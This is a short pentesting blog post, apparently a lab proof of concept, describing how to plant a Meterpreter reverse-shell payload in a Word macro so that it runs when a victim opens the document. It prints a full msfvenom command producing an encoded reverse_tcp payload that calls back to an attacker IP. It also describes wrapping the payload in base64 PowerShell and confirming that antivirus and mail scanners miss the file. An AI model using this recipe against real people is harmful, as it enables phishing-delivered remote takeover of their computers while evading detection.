Windows Exploit with Word Macro
1. Exploit Info
Using Microsoft Word File to exploit Victim's computer. Inserting malicious vb codes into word macro. then when victim opens that file, the codes will be run reverse-shell
2. Target Information
- Victim :
IP Address : 192.168.56.132
Mail : mail.naver.com
OS : Windows 10 pro x86-64 kor
MS Word ver : word 2016 professional plus
AV : yes ( with virustotal.com )
- Attacker :
IP Address : 192.168.56.129
OS : Kali Linux v2016.01 x86-64
3. Exploit
This time, we will use macro function to execute malicious code ( reverse shell code ).
So, we are enough to exploit any targets who have MS Office which supports 'macro'
1. First, we need to make our own reverse shell payload with 'msfvenom'
[ Options : msfvenom -p windows/meterpreter/reverse_tcp 192.168.0.35 4444 --platform windows --smallest StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 -f c ]
In Short, we make a reverse shell payload encoded with skikata_ga_nai ( poly xor encrypt )
2. Second, Using custom script which makes power shell code. That codes include above payload encoded with 'base64'.
And macro.txt data just like below..
Just put macro.txt data into any .doc files' macro
Then, when victim just opens that .doc file, that codes will be executed automatically
3. Before we attack with this file, lets check this file with AVs and mail virus detector.
There are no problems with AVs
4. If Codes executed normally, we can get victim's shell! like below
- End of PoC -
4. Analyze
making reverse shell payload to power shell code
Reference : https://github.com/trustedsec/unicorn
'Research > Pentesting' 카테고리의 다른 글
[Pentesting] Exploit Adobe Flash v18.0.194 (cve-2015-5119) (0) | 2016.08.04 |
---|---|
[Docs] Cracking Windows XP/7/8 Account Password (0) | 2014.04.27 |
[Pentesting] Windows 7 Exploit with ms10_046 (0) | 2014.04.27 |
[Pentesting] XP sp3 Remote Exploit with ms08_067 (0) | 2014.04.27 |
[Pentesting] XP sp3 Exploit with Backdoor (0) | 2014.04.27 |